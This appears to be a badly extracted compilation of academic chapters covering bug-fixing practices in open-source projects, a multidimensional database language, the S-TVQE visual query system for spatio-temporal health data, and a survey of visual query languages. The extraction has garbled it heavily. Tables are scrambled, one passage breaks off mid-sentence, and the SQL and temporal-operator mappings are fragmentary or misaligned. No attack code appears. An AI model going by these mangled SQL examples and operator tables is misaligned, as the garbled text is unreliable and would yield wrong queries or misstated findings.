Admin-developer: warmenhoven; Developer: robflynn
Admin-developer: loic1; Admin-developer lem9.
2
6
4
3
8
5
5
-
813
Bug Fixing Practices within Free/Libre Open Source Software Development Teams
(S) and finishes with bug closing (C). Submitters may submit problems/symptoms associated with bugs (Ss), incompatibility problems (NC) or/and also provide information about code back trace (BT). After submission, the team’s project managers or administrators may assign the bug to someone to be fixed ((A); (A*) if they self-assign the bug). Other members of the community may report similar problems they encountered (R), discuss bug causes (T), identify bug causes (G) and/or verify the impossibility of fixing the bug. Participants often ask for more information to better understand the bug’s causes (An). In most cases, but not always, after some discussion, a team member spontaneously decides to fix (F) the bug. Bug fixing may be followed by a test and the submission of a patch (TP). Testing is a coordination mechanism that manages usability between producing and using a patch, by ensuring that the patch is usable. However, as later explained, in the examined projects this type of activity is not often found. The bug is then closed (C). Bugs may also be closed because they cannot be fixed, for example, if they are not reproducible (CNR), involve functions not supported yet (CNS) and/or are intentionally introduced to add new functionality in the future (CNCP). Notice
that the closing activity is usually attributed to a particular user. For our analysis, we consider Submission, Analysis, Fix and Close to be operative activities, while Assignment, Test and Posting are coordination mechanisms. As already discussed, Assignment is the coordination mechanisms used to manage the dependency between a task and the actor appropriate to perform it. Posting is the mechanisms used to manage the dependency between a task and its customers (it makes the fix available to the persons that need it). The tasks identified above are linked by sequential dependencies as shown in Figure 3. These dependencies were identified by considering the logical connection between tasks based on the flow of resources. For example, a patch can not be tested before it is created. Because the dependencies can be satisfied in different orders, different sequences of the activities are possible. The tasks and their sequence change from bug to bug. Figure 3 shows the most frequent sequences observed, as identified by tabulating and counting the sequences. Table 5 shows the portion of processes that follow each possible paths, based on the collected ways the bug-fixing process is observed to be
Figure 3. Task dependencies in the bug-fixing process 6 close 1 L L
3 analyze L
1 submit
5 test&post 2 assign L L
814
4 fix
Bug Fixing Practices within Free/Libre Open Source Software Development Teams
Table 5. Portion of processes for each possible path i 2
task i-1 S
3
S
As
An
F
TP
C 4
S
An
F
task i S As An F TP C An F TP C An F TP S An F TP C An F TP C An F TP C An C S An F TP C S An F TP C S As An F TP
Table 6. Task occurrences and average number of tasks per projects Task Project (bugs) KICQ (31) Dynapi (95) Gaim (51) Phpmyadmin (51)
(S)
(Ag)
(An)
(F)
(TP)
(C)
Avr. tasks per bug
44 121 71 54
4 0 1 2
24 94 77 66
23 54 28 45
0 9 4 15
31 95 51 51
4.4 3.8 4.2 4.6
817
Bug Fixing Practices within Free/Libre Open Source Software Development Teams
performed within the FLOSS teams. For example, row 1 of Table 5 is read as follows. In the Dynapi project, submission always occurs as the first task (as it does for all of the groups, by definition), while the second task is S in 26% of cases, An in 39% of cases, F in 19% of cases, TP in 1% of cases and C in 15% of cases, and so on. In Table 6, we describe the occurrences per task for the four projects and the average number of tasks to fix bugs. A χ2 test shows a significant difference in the distribution of task types across projects (p ( [], < measure 2> [], ...) [ connect to , , ... ]; create dimension ( [], [],...) [ as () ] [ with hierarchy (level [(, < weak_attribute1_2>,...)], level [(, < weak_attribute2_2>,...)],...), with hierarchy < hierarchy_name 2> … ] ; Drop orders drop dimension < dimension_name>; drop fact [cascade];
DML The Data Manipulation Language consists in inserting, deleting, updating, or querying multidimensional databases.
update dimension < dimension_name > set = , [ set = ,…] [ where ]; update dimension < dimension_name > set (, ,…) = () [ where < predicate > ]; Delete orders delete from dimension < dimension_name > where < predicate >; delete from fact < dimension_name > where < predicate >; Select order select (), < aggregate_ function >(), … [ according to [ rows , ,…, of < dimension_name _row > with , ] [ columns , ,…, ] of < dimension_name_col> with ] ] from [ where ] [ order by values(, ,…) […[ , values(, ,…)],…] ];
This work was previously published in Database Modeling for Industrial Data Management: Emerging Technologies and Applications, edited by Z. Ma, pp. 323-360, copyright 2006 by Information Science Publishing (an imprint of IGI Global).
986
987
Chapter 3.8
Toward a Visual Query System for Spatio-Temporal Databases Valéria M. B. Cavalcanti Federal University of Campina Grande, Brazil Ulrich Schiel Federal University of Campina Grande, Brazil Claudio de Souza Baptista Federal University of Campina Grande, Brazil
ABSTRACT Visual query systems (VQS) for spatio-temporal databases, which enable formulation of queries involving both spatial and temporal dimensions, are an important research subject. Existing results treat these dimensions separately and there are only a few integrated proposals. This chapter presents a VQS called spatio-temporal visual query environment (S-TVQE), which allows the formulation of conventional, spatial, temporal, and spatio-temporal database queries in an integrated environment. With S-TVQE, the user, instead of querying the database by textual query languages will interact with the system by visual operators for the statement of the query conditions. The tool provides a visualization of
the results in different formats such as maps, graphics, and tables.
INTRODUCTION The growing significance of geographic information systems and other spatio-temporal information systems is unquestionable (Sellis, Frank, Grumbach, Guting, & Koubarakis, 2003). Decision-makers need to analyze data through thematic maps, timelines, search critical regions, and so on. Therefore, it is mandatory to provide user-friendly tools, specially designed for these decision-makers so that they can express their needs adequately and explore the full potential of the underlying information systems. The visual specification of
Toward a Visual Query System for Spatio-Temporal Databases
database queries enables an abstraction of the database schema and textual query languages, which makes user interaction easier. A visual interface represents an additional layer (Shneiderman, 1998), which interacts between the user and a textual query language as, for instance, structured query language (SQL) (Silberschatz, Korth, & Sudarshan, 2005) in order to access a database. For instance, spatial constraints from the visual query are converted to SQL statements, which are executed on the underlined database management system (DBMS). That task must be executed in a transparent way, in other words, no knowledge on database schema and language syntax is required (Snodgrass, 1999), which facilitates the usability of the database mainly for sporadic users, which are not familiar with technical details of the database. The use of visual query interfaces is more significant for spatio-temporal databases as for conventional databases for two reasons: (1) spatial data are inherently visual and (2) textual query languages for those enhanced applications are more complicated since they must provide syntax to express temporal and spatial restrictions. For textual database query languages such as SQL (Silberschatz, Korth & Sudarshan, 2005), there are extensions to access temporal data such as TSQL2 (Snodgrass 1995), and spatial data
such as spatial-SQL (Egenhofer, 1994). These extensions are adequate for experienced database programmers and automatic data extraction tools. Many end users have no expertise on computer systems. For this group, visual query systems has proven to be the most adequate interface (Catarci et al., 1997). This chapter presents a generic visual environment for the access to spatio-temporal database systems especially geographic information systems. The environment can be plugged into existing databases. For the validation of the system, we used real data from geo-referenced health information of the Brazilian Health System (SUS). SUS is an institution responsible for collecting, processing, and disseminating health information of Brazilian government. Information related to health is generated daily in the whole country, and is stored considering valid time and spatial parameters. The volume of information already existent is very large and increases every day. Seeking to improve the quality of investments of health resources, the administrators perform statistical analyses with this data. The health information system divides the country into regions, states, regional health nucleus (NRS), and municipal districts. Data about
Figure 1. Class schema of the health information system H O S P IT A L (S ) id nam e
D IS T R IC T (S ) lo ca te d -in 0 ..*
1
a tte n d s
0 ..* bedsp e cia lity P A T IE N T (T ) 1 ..* S P E C IA L IT Y nam e
988
1 ..*
co d e a ih -p re se n t (T ) a ih -p a id (T )
1
ib g e -co d e ib g e -n a m e p o p u la tio n (T )
Toward a Visual Query System for Spatio-Temporal Databases
hospitals, admissions, attendances, and so on are stored in the database. A simplified conceptual schema using UML notation for this system is shown in Figure 1. Note the following conventions: objects may be conventional, spatial, temporal, or combinations of them. These characteristics are stated at class level attached to the class name. For instance, HOSPITAL (S) is spatial and PATIENT (T) is temporal. This means that each instance of HOSPITAL has an implicit geometry and each PATIENT has implicit valid-time attributes. Attributes may be either conventional or temporal. For instance, DISTRICT.population (T) is a temporal attribute. Note that in the class PATIENT we have the history of the patients and, for each patient, we have the history of their registration cards (aih), when they were admitted (aih-present) and when they were paid (aih-paid). The remainder of this chapter is organized as follows. The next section addresses related work on visual query systems. After that, we review the limitations of current systems and present the S-TVQE environment. What is missing in order to get a completely satisfactory solution is discussed next, and the last section concludes the work.
RESEARCH BACKGROUND ON VISUAL QUERY SYSTEMS A great effort in research has been spent to develop more user-friendly interaction paradigms, especially considering some kind of visual interaction, for both conventional and advanced databases (Bonhomme, Trépied, Aufaure, & Laurini, 1999; Morris, Abdelmoty, Tudhope, & El-Geresy, 2002; Shimabukuro, Branco, Oliveira, & Flores, 2003). According to the visual formalism adopted in the query, visual query systems may be classified into: •
Table: Data is organized and visualized as tables. Preview of table extension and intension may be available (e.g., QBE).
•
• •
Diagrammatic: By using a graph it is possible to visualize both schema and instances. Iconic: Uses icons to represent data. Hybrid: Combines the previous visual representations in a unique interface.
For accessing spatio-temporal databases, the most of new visual interfaces have been developed either for spatial data such as ArcGis (2006), CIGALES (Calcinelli & Mainguenaud, 1994), Geomedia (2006), spatial query by sketch (Egenhofer, 1997), geovisual (Soares, 2002) or for temporal data as TVQE (Silva, Schiel, & Catarci 2002), and TVM-Web (Silveira, Edelweiss, & Galante, 2004). Geomedia and ArcGis are commercial GIS, which provide visual interaction with limited support for temporal and spatio-temporal dimensions. CIGALES (cartographical interface generating and adapted language for extensible systems) (Calcinelli & Mainguenaud, 1994) supports visual queries to a geographical database. The user combines lines and areas with some spatial operators to build the query. Spatial query by sketch (Egenhofer, 1997) enables the definition of spatial queries through sketch, which represents the spatial relations between the schema elements. Apart from the spatial relation, other relations may be used. Ambiguities are solved through user interaction. Morris et al. (2002) have developed a visual query environment for large spatial databases using a diagrammatic approach based on a data flow metaphor. They propose icons for the different spatial relations and use a hierarchy for the different granularities of these relations. TVQE (temporal visual query environment) (Silva, Schiel & Catarci, 2002) is a visual query system for temporal databases. It is a hybrid system as it uses diagrammatic and iconic representations. It is based on the temporal graph model (TGM) (Silva, Schiel & Catarci, 2002), which specifies a conceptual database schema as a directed graph
989
Toward a Visual Query System for Spatio-Temporal Databases
in which edges represent classes, relationships, and attributes, being temporal or not. TVM Web (Silveira, Edelweiss & Galante, 2004), like TVQE, is a visual query system on the Web for temporal data. It aims to supply the user with a friendly and easy learning interface that explores the temporal and versioned information stored in a TVM database. Visual interfaces for spatio-temporal databases are query-by-trace (Erwig & Schneider, 2000) and the visual interactive query interface (Li & Chang, 2004). Query-by-trace (QBT) is a system that enables the definition of spatiotemporal queries through primitive graphics based on lines and areas that represent the space operations. The user inserts objects freely (line or area) in an area for definition of the moving trace of the object. Several such traces determine the spatial relations between the objects in the query. QBT realizes the mapping into primitive space operators for subsequent optimization. To represent the moving of objects through time they use a two-dimensional area, one axis representing the space and the other time. This system is specifically designed for describing and querying moving objects. The visual interactive query interface (Li & Chang, 2004) proposes a visual query system based on an extension of SQL for spatio-temporal databases, called ΣQL. The system has been applied to movie databases and there is no evidence that it works properly on geographic information systems. Lvis (Bonhomme et al., 1999) is a visual query language extended from the CIGALES project (Calcinelli & Mainguenaud, 1994), which provides support for conventional, spatial, temporal, and spatio-temporal queries, using the query-by-example metaphor. It uses topological and metric spatial relations and there is no evidence that the query results are spatial, temporal, or graphic.
990
THE SPATIO-TEMPORAL VISUAL QUERY ENVIRONMENT As has been seen in the previous section, there are many approaches supporting the expression of visual queries for spatial database or for temporal databases. Integrated proposals for spatio-temporal databases concentrate on moving objects. One of the most significant data in geographic information systems are temporally bounded maps. Therefore, in order to state queries adequately to their data structures, visual query systems integrating spatial and temporal constraints are mandatory. In this context, we present a spatio-temporal visual query environment called S-TVQE which achieves this integration. S-TVQE is an extension of the temporal visual query environment (TVQE) (Silva, Schiel, & Catarci, 2002), which adds to conventional and temporal visual query operations, support for stating spatial and spatio-temporal queries. In this section, we address important issues on designing visual query system with spatio-temporal capabilities. Firstly, a methodology for the interface design is addressed, followed by the importance of providing a configurable interface. Then architectural issues are highlighted. Hence, we focus on the important aspects for non-spatial, spatial, temporal, and spatiotemporal visual query systems (VQS).
Interface Design Issues There are many methodologies for designing a user-friendly interface (Hackos, 1998; Shneiderman, 1998). The task-oriented methodology such as ICM (interface conception method) (Scherer, 2003) is very appropriated for the development of visual query systems. This methodology is interactive, task oriented, and user-centered. ICM contains seven steps:
Toward a Visual Query System for Spatio-Temporal Databases
1.
2. 3.
4.
5.
6.
7.
Requirements analysis and specification: Provides the requirement analysis for STVQE. Task modeling: Determines the necessary actions to execute system tasks. Interaction modeling: Associates task objects with interaction ones based on the task model giving an interaction model. Visual modeling: Defines the objects presentation based on ergonomic issues, user profile, and task features. The establishment of navigation and help procedures: Identifies and organizes the interface transition situations. Prototype construction: Generates an interface prototype code, based on the previous artifacts. Prototype evaluation: Interface validation through usability tests.
Flexible Configuration through XML XML has been largely used for providing flexibility on system configuration. This flexibility avoids code recompilation, as only a new deployment is necessary. Therefore, we have followed this approach in the design of the S-TVQE, which enables it to work in different contexts, being necessary to just configure a XML file that determines the primitive operations and the schema of the database. In order to define the current database, which determines the context to be configured in STVQE, an XML file is edited. This file represents a view of the underlying schema, which describes the tables, keys, and attributes. For spatial objects there is an element called level with an id attribute, which indicates the “contains” spatial relationship. So that leveli+1 is spatially contained in leveli, each level element contains sub-elements, which indicate the geometric field, the table key, and attribute features
such as column name, column type, table, and whether the attribute is conventional, spatial, or temporal. Finally, an element called grouped describes an optional aggregation function to be used. An example of such an XML configuration, describing the levels “state” and “district” of the health information system follows: State statemap geom_id District districtmap geomid
991
Toward a Visual Query System for Spatio-Temporal Databases
Architectural Issues S-TVQE was developed to serve as a generic interface for spatio-temporal databases and could be connected easily to any relational database system with spatial capabilities such as PostgreSQL, Oracle, DB2, or MySQL. Nonetheless, there are many proposals of temporal query languages from which TSQL2 (Snodgrass, 1995) is the most representative. None of them have been incorporated in the SQL standard. Moreover, there is no SQLlike language combining spatial and temporal capabilities. Furthermore, there is no widely used temporal database management system. For this reason we considered that the underlying DBMS is relational with spatial capabilities. The validtime temporal information is stored as explicit time attributes ( from, to). In this environment, the temporal primitives must be converted to relational predicates concerning the attributes from and to. We have adapted the mapping of
temporal queries of TVQE developed by Santos (2000), considering also spatial queries. The S-TVQE architecture is distributed into three tiers as can be seen in Figure 2. S-TVQE is available on the Web through a browser and therefore can be used in different platforms. After an interactive query statement has been produced, the interface (presentation layer) sends the query operators stored in an XML file to the query manager through an http protocol using JSP technology. These primitive graphical operations are converted into SQL commands running on the database via JDBC. The visual results are rendered using Java, XML, and SVG technologies.
Query Interaction In order to pose a query, users may follow several steps. The following algorithm presents the whole interaction process. • • •
Figure 2. The S-TVQE architecture •
• • •
Definition of the geographic area of interest: “Visual Selection”; Chose the attributes, which will take part in the query: “Searching Attributes”; Optionally, define restrictions on the chosen attributes: “Query Item Edition”; Choose the operator (spatial, temporal, or relational) according to the dimension of the attribute: “Operators”; Fill necessary fields: “Query Item Edition”; Add the attribute to obtain the query: “Current Query”; Query results.
In the following, we explain in detail each of these steps. As an example to illustrate the steps, we use the query “show the neighbor districts of Campina Grande in the III NRS of the state of Paraíba, Brazil, which has an ambulatory and numbers of admission (aih) less than 50 during the year of 2002.”
992
Toward a Visual Query System for Spatio-Temporal Databases
Figure 3. Map navigation to define the region of interest—Brazil -> Northeast Brazil -> Paraiba State -> Campina Grande district
Figure 4. Attributes from the III NRS region
993
Toward a Visual Query System for Spatio-Temporal Databases
Figure 5. Example of a conventional attribute chosen
Figure 6. Example of a current query
994
Toward a Visual Query System for Spatio-Temporal Databases
Step 1: The definition of the geographic area of interest is done through “visual selection.” The user visually chooses the region of interest by navigating in the map (Figure 3). Also, it is possible to enter the region of interest by name. Step 2: Choice of the attributes, which will take part in the query: “Searching Attributes.” If the region of interest has been fixed, the attributes from the chosen geographical area are displayed. They may be conventional (non-spatial) (denoted by ), spatial (denoted by ), and temporal (denoted by ) as shown in Figure 4. Step 2.1: Definition of optional query restrictions on the chosen attributes: “Query Item Edition.” After choosing an attribute, its possible operators—conventional, spatial, or temporal— are displayed and the user may specify the query restriction as shown in Figure 5. Step 3: Add the attribute to the query: “Current Query,” which will have the geographical area chosen, the attributes, specific operator (conventional, spatial, temporal), and the restriction as shown in Figure 6. Step 4: Query Results: According to the dimension of the attributes chosen for the query,
there are different types of results as shown in Table 1. Spatio-temporal queries can use combinations of the previous formats. For instance, the result
Table 1. Possible ways of exhibition in the projection of the results
Description Attributes with historical significance, in other words, associated to a valid time interval. Attributes related to a geographical location. Attributes without temporal or spatial reference.
Supported dimension
Projection
Temporal
Table or Graphic
Spatial
Table or Map
Conventional
Table
Figure 7. Spatial query result
995
Toward a Visual Query System for Spatio-Temporal Databases
Figure 8. Temporal query result
of a spatio-temporal query can show a sequence of maps, each one associated to a specific time. Figure 7 shows the map for February 2002 and Figure 8 displays a complete time-graph.
Query Translation S-TVQE enables the definition of conventional, spatial, temporal, and spatio-temporal queries. The query translator is responsible for generating the SQL code of the visual query according to the underlying DBMS syntax.
Conventional Queries
Figure 9 shows the chosen attributes for this query. Table 2 shows the relational operators for conventional queries and their equivalent SQL mapping. The previous query is then translated into SQL as: SELECT
nrs.gid = district.nrs and upper(nrs.ibge_ name) = upper(‘III NRS’) and population. qty > 10000 and district.gid = population. district and net_clinic.clinic > 0 and district. gid = net_clinic.district and population.until ISNULL and net_clinic.until ISNULL
GROUP BY
district.ibge_name, nrs.ibge_name
Conventional queries are those that use neither spatial nor temporal dimensions. The operators allowed are the relational ones. Example of such query would be: Retrieve the city names of the III NRS region, the population of which is greater than 10,000 inhabitants and net clinic is above 3.
996
Toward a Visual Query System for Spatio-Temporal Databases
Figure 9. Attributes and their restrictions
Table 2. Relational operators mapping Operator
SQL Mapping--Conventional SELECT FROM
Equal
WHERE table.attribute = value SELECT FROM
Less Than
WHERE table.attribute < value SELECT FROM
Less or Equal Than
WHERE table.attribute value SELECT FROM
Greater or Equal Than
WHERE table.attribute >= value
Spatial Queries Spatial queries require at least one geometry to deal with a spatial operator. An example of such a query would be: Retrieve the cities adjacent to the city of Campina Grande, which are part of III NRS region and the population of which is less than 10,000 inhabitants. Tables 3, 4, and 5 present the spatial operators and its mapping to SQL. The previous query is translated into SQL as: SELECT FROM WHERE
district.ibge_name, district.the_geom, sum(population.qtdy), nrs.ibge_name district, population, nrs nrs.gid = district.nrs and upper(nrs. ibge_name) = upper(‘III NRS’) and touches(district.the_geom, (select the_ geom from district where upper(ibge_ name) = upper(‘Campina Grande’))) and population.qty < 10000 and district.gid
997
Toward a Visual Query System for Spatio-Temporal Databases
Table 3. Mapping metric spatial operators into SQL S-TVQE Operator
DBMS Operator
Table 5. Mapping topologic spatial operators into SQL S-TVQE Operator
AREA (GEOM)
Touches (geom1, geom2) Adjacency
Area
Not touches (geom1, geom2)
PERIMETER (GEOM) Disjunction
Perimeter DISTANCE (geom1, Distance
PostgreSQL + PostGis Operator
geom2)
Contains (geom1, geom2) Covered By Within (geom1, geom2)
Table 4. Mapping directional spatial operators into SQL
Temporal Queries Temporal queries deal with historical data, which have specific operators. An example of such query would be: “Retrieve the cities, from III NRS region, which have the number of admissions(aih) less than 200, during the year 2002.”
Toward a Visual Query System for Spatio-Temporal Databases
Tables 6, 7, and 8 present how temporal constraints are mapped into SQL clauses. The time of the query is given by the variable “p” and the valid-time of the objects in the database is “tv.”
Table 8. Mapping period temporal operator into SQL S-TVQE Operator
SQL Period mapping SELECT FROM
Before
Table 6. Mapping instant temporal operator into SQL
WHERE tv.end < p.begin SELECT FROM
WHERE tv.begin = p.begin AND tv.end
S-TVQE Operator
Start SQL Instant mapping
SELECT FROM
SELECT FROM
Begin
WHERE tv.begin = p
During
End
< p.end FROM
FROM
At
WHERE tv.begin > p.begin AND tv.end SELECT
SELECT WHERE tv.begin = p
< p.end
Cross 1
WHERE p.begin > tv.begin AND tv.end > p.begin AND p.end > tv.end
SELECT
SELECT
FROM
FROM
WHERE tv.end = p
Cross 2
WHERE tv.begin > p.begin AND p.end > tv.begin AND tv.end > p.end SELECT FROM
Table 7. Mapping interval temporal operator into SQL
Precedes
WHERE tv.end = p.begin SELECT FROM
S-TVQE Operator
SQL Interval selection
After
SELECT FROM
SELECT FROM
WHERE p >= (SELECT MIN(table.begin) First Interval
Finish
WHERE p.begin < tv.begin AND tv.end = p.end
FROM table) AND
SELECT
p p.end
FROM
SELECT
WHERE p >= (SELECT MAX(tv.begin)
FROM
FROM table) AND p ’2002-01-01’ and admission.until’2002-01-01’ and admission.until 16
age < 20
name = “Smith”
People
Visual Query Languages, Representation Techniques, and Data Models
defined as hybrid. In this type of language, tables and diagrams are often used to define the database schema and constraints, icons can represent specific prototypical objects and operations, and sketches can be useful to specify topological and geometrical constraints. This is particularly common when considering the implemented version of the languages; for example, even a purely tabular VQL like QBE has some diagrammatic features in the implemented version of the language provided by Microsoft Access. An interesting example of hybrid VQL is Kaleidoquery (Murray, Paton, & Goble, 1998). This is based on a filter flow model, representing the successive filtering stages operated by the query from the initial mass of information to the required output result. In this language, classes of objects in the database are represented by icons and diagrams are used to depict the flow and refinement of information through the query (see Figure 4).
DATA MODELS AND VQLS A data model is a combination of constructs used to organize data (Atzeni, Ceri, Paraboschi, & Torlone, 1999). This is strictly related to the concept of schema, as the adoption of a certain data model determines the way data are structured, and consequently the schema types present in the database. As previously noted, one of the key aspects in the formulation of a query is the specification of the input and output schemas. Since the schema types in a database are determined by the specific data model adopted, the model itself has a significant influence on the query language’s characteristics: data models with more sophisticated, modular constructs require a corresponding higher level of complexity in the query language constructs, regardless of whether they are textual or visual. On the other hand, some data model constructs, such as hierarchical relationships, have a more straightforward, intuitive representation in visual languages.
A fundamental step in specifying the query input schema is the display of the database’s available schema. A formal approach to this fundamental issue was proposed in Haber, Ioannidis, and Livny (1994) and is based on the concepts of visual schema and visual metaphor. The visual schema describes not only the information structure by visual primitives defined in the specific visual model, but also the way data schema information must be presented on the screen. The visual metaphor is simply a mapping between elements of the database and visual schema. In conventional graphical user interfaces, visual schemas are used both to present data schema information in visual form and to manipulate the data schema by modifying the elements of the visual schema.
The Impact of Model Abstraction The effectiveness of a VQL is strongly influenced by the simplicity and intuitiveness of the visual model and hence, through the visual metaphor, of the data model. Complex, abstract, and semantically rich data models tend to produce complex visual models with a high impedance mismatch with the underlying data structures. However, elementary data models have necessarily limited representation capabilities and complex concepts need to be mapped to over-simplified visual constructs, far from the user’s perception of the area of interest. Traditionally, data models are classified into three main categories each corresponding to a different abstraction level in the representation of the area of interest: •
Conceptual models (e.g., the entity-relationship data model) are the most abstract and describe concepts of the real world, rather than the data used to represent them. Due to their high level of abstraction they are commonly used in the first phases of the database design process, but the actual implementation of DBMSs (and consequently
1009
Visual Query Languages, Representation Techniques, and Data Models
•
•
of query languages) based on them can be quite problematic. Logical models (e.g., the relational, hierarchical, and object data model) reflect a particular organization (table, tree, object) of the data, facilitating the implementation of DBMSs based on them and query optimization, while maintaining a good level of abstraction expressed by the so-called property of physical independence. The interaction with the DBMS is independent of the data’s physical aspects (files, storage systems, etc.). Most DBMSs and query languages (especially visual ones) are therefore based on logical models. Physical models are strictly related to the physical organization of data in the DBMS (storage techniques, access structures, etc.) and are therefore inappropriate for the definition of high-level, user-friendly query languages.
Even if most VQLs are based on logical models, there can be significant differences among them, mainly related to the particular data organization (e.g., table, tree, object) on which the model is based. In the following section, we classify VQLs according to their data model, focusing on languages based on (1) conceptual models; (2) the relational model; (3) the functional model; (4) the object model; (5) XML. Finally, we consider the case of VQLs specifically designed for particular types of data (e.g., geographical and multidimensional data).
VQLs Based on Conceptual Models The entity-relationship (E-R) model was originally proposed in Chen (1976) and is commonly recognized as the standard conceptual model for database design. As such, it can be mapped to several different logical data models and consequently to DBMSs and storage techniques. It is also a graphical model based on fairly simple
1010
diagrams consisting of a few geometric elements connected by edges. In consequence, it could be considered an ideal starting point to define a visual query language. However, its high level of abstraction is also its main drawback for use in a real DBMS, as some transformations from the visual to the logical level can be particularly difficult and some manipulations that can be straightforwardly expressed at the logical level may be cumbersome to define at the conceptual level. A VQL based on the E-R model is proposed in Czejdo et al. (1989). Queries are expressed by visually selecting the elements of interest (entities and relationships) in a database schema displayed as an E-R diagram. Conditions on the selected elements are expressed by a set C, initially empty, of condition descriptors, stating for example that the attribute of an entity must be equal to a given constant value. In Angelaccio et al. (1990), the QBD* system is described; this allows the user to interact with the conceptual (E-R) schema of the database at different abstraction levels through a top-down browsing mechanism. A set of graphical primitives can be used to extract the subschema containing the query concepts (i.e., the input schema) as well as to filter and transform the selected concepts, defining the desired output schema. SUPER (Dennebouy et al., 1995) is based on an object-based extension of the E-R model called ERC+ and designed to support complex objects and object identity. SUPER has a layered structure allowing the user to interact with the ERC+ elements independently of the actual underlying DBMS and comprising a specifically designed algebra in the intermediate layer. The construction of a query encompasses a sequence of activities performed through the visual interface: definition of the query frame (input schema), the specification of conditions on the database occurrences, and finally the output format. Another example of a “conceptual VQL” is ConQuer (Bloesch & Halpin, 1996), which is based on the object-role modelling (ORM) approach to conceptual modelling.
Visual Query Languages, Representation Techniques, and Data Models
VQLs Based on the Relational Models In the relational model (Codd, 1970), data are represented by collections of relations or, more intuitively, as collections of tables. Each table (relation) has a specific, well-defined structure (the relation schema) with a table name and a collection of column names called attributes, and consists of a collection of related rows (tuples) of data values (the relation instance). Queries can be expressed in a variety of textual languages (e.g., relational algebra, domain and tuple calculi, datalog and SQL.) Integrity constraints (i.e., properties that must be satisfied by relation instances representing semantically correct information in the domain of interest,) can also be defined. Integrity constraints, especially referential constraints, are often exploited by VQLs to highlight the semantic links existing among tables and to perform automatic joins between them. The simplicity and strong mathematical foundations of the relational model are certainly two key factors for its great success. In fact, the vast majority of currently available DBMSs are relational and in consequence, many visual languages proposed in the literature are based on this model. Since relational data have a fairly simple structure, relational VQLs can usually achieve a good trade-off between expressive power and language complexity. In contrast, when dealing with more sophisticated data models (e.g., based on objects or semi-structured data) the higher complexity necessarily permeates the query language (even in the textual case) and this trade-off is much more difficult to achieve. The tabular structure underlying the model is well suited to VQLs based on tabular forms such as the query-by-example (QBE) language previously mentioned, originally proposed in Zloof (1977) and later implemented with some variations in several DBMSs. Other approaches are based on the use of icons and attempt to exploit the additional information provided by the integrity constraints to guide
the query’s construction. For example, VISIONARY (Benzi, Maio, & Rizzi, 1999) is based on a layered structure where the visual metaphor uses an intermediate graph model for the mapping between the internal relational schema and the external icon-based visual schema. A relational database is represented in the intermediate graph model by a non-directed graph where each vertex corresponds to a table and the edges represent potential links (i.e., relationships determined by referential integrity constraints). The basic primitives of the visual model are the concepts (represented by the combination of a text and an icon) and the associations between concepts (represented by labelled oriented edges). The user specifies the input schema starting from a primary concept, which determines a set of default joins, and then refines it up to the desired output with projection and selection operations by interacting with the visual schema displayed on the screen. A semantic graph model is also used in Zhang et al. (1999) where nodes represent tables and the edges correspond to joins between relations, which are used to support the user in the query formulation process. The query-by-browsing (QBB) paradigm (Polyviou, Samaras, & Evripidou, 2005) proposes a quite different approach to visual querying based on the tuple relational calculus and folder hierarchies. Tables are represented as folders and the relationships between them (e.g., foreign key references) as folder/subfolder relationships, which can be “followed” by opening the table folder containing the reference. A table folder also contains attributes and records corresponding to the table schema and instance on which constraints can be defined. Figure 5 gives an example of a folder tree representing the schema of a relational database describing the relationships between students, professors, courses, classes, and rooms. Folders can also act as operators to filter and combine the respective subfolders. To define the query output schema the concept of document is introduced. This is a materialized view over the
1011
Visual Query Languages, Representation Techniques, and Data Models
Figure 5. A folder tree in query by browsing Professors Students Professors Classes Courses Rooms Grades Grades Classes Professors Rooms Courses Courses Grades Classes Courses Rooms
straightforward and the user’s navigation among the schema elements can be guided by the functional links between concepts. Gql (Papantonakis et al., 1994) is a VQL based on the functional data model. Similarly to VISIONARY, the database schema is represented by a graph where nodes correspond to entities and labeled directed edges to functions. Entities can be either lexical (broadly corresponding to simple data types such as strings, numbers, etc.) or abstract (corresponding to real world concepts). Lexical entities are visualized as ovals and abstract entities as circle nodes. Queries are expressed by selecting elements on the input schema, specifying constraints on them (e.g., =”Rome,” >10, etc.) and indicating the subset that will constitute the output schema. Various types of boxes can be used to enclose portions of the input schema and define nested queries, aggregations, negations, disjunctions, quantifications, etc.
VQLs Based on the Object Data Model data contained in the document’s parent folder and its subfolders. Although based on the relational model, QBB has also been shown to possibly accommodate more complex data models (e.g., based on objects or XML).
VQLs Based on the Functional Data Model The functional data model (Sibley & Kerschberg, 1977) is basically a functional view of the binary relational model in which the area of interest is represented by entities and binary relations between pairs of entities. More precisely, each binary relation over domains A and B is equivalently defined by a pair of (possibly multi-valued) functions from A to B and from B to A, forming, together with the entities, the basic elements of the model. The main advantage of this simplified data model is that mapping between the data schema and the visual schema is generally more
1012
The object data model was developed to overcome some limitations of the relational model and is based on the extension of the object-oriented programming paradigm (specifically, the concepts of class, object identity, encapsulation, inheritance) to databases (Atkinson et al., 1989). Objects in an object database can have a much more complex structure with respect to the rows (tuples) of a relational database, as the single object components may also contain references to other objects, as well as sets, bags (multisets), and lists of elementary values or even of other objects. Classes of objects can also be organized in generalization hierarchies where more specific classes “inherit” and typically specialize the schema of the more general ones. Since the elements of an object database usually have this fairly complex nested structure, the use of tabular metaphors is not as obvious or straightforward as in the relational case. In contrast, graph-based
Visual Query Languages, Representation Techniques, and Data Models
approaches are usually preferred where different edges are used to represent nesting and relationships among objects. Iconic approaches are also well suited to represent objects, classes, and the various relationships among them visually. The visual query system for object databases of the integrated environment PROOVE (Doan, Paton, Kilgour, & al-Qaimari, 1995) supports two alternative (form- and graph-based) visualization metaphors. In the graph-based interface, the input and output schemas are visualized by directed graphs where double rectangles represent classes, single rectangles represent elementary data types (e.g., integer, float, and string), and the edges describe the class structure. The two schemas are displayed in two separate frames of the user interface (see Figure 6). By selecting a node in the input schema, the user can include it in the output schema (query graph), which is displayed in the query window. The query can be further refined in this window by expressing conditions and/or extending the output schema by popup menus attached to the various nodes. The
example query shown in Figure 6 is taken from Doan et al. (1995) and represents the retrieval of the details of all books borrowed by borrowers with a cname of Scott. A graph-based interface is also used in O2Talk (Sentissi & Pichat, 1997). In this language, classes are depicted by rectangle nodes, attributes by continuous or discontinuous ovals (for atomic and complex attributes respectively), and the class-superclass relationships are represented by links between classes. Queries in VOODOO (Fegaras, 1999) are represented by trees of forms, which have some analogies with QBB folder trees. The forms reflect the database schema and every class or type reference in the schema can be “expanded” by clicking on the corresponding form button in the visual interface, potentially leading to an infinite tree. Each tree node consists of a form and represents a class or structure in the database schema. Besides being used to expand the query tree, the individual fields in each form can be filled in with constant values and expressions or be included in the output schema, similarly
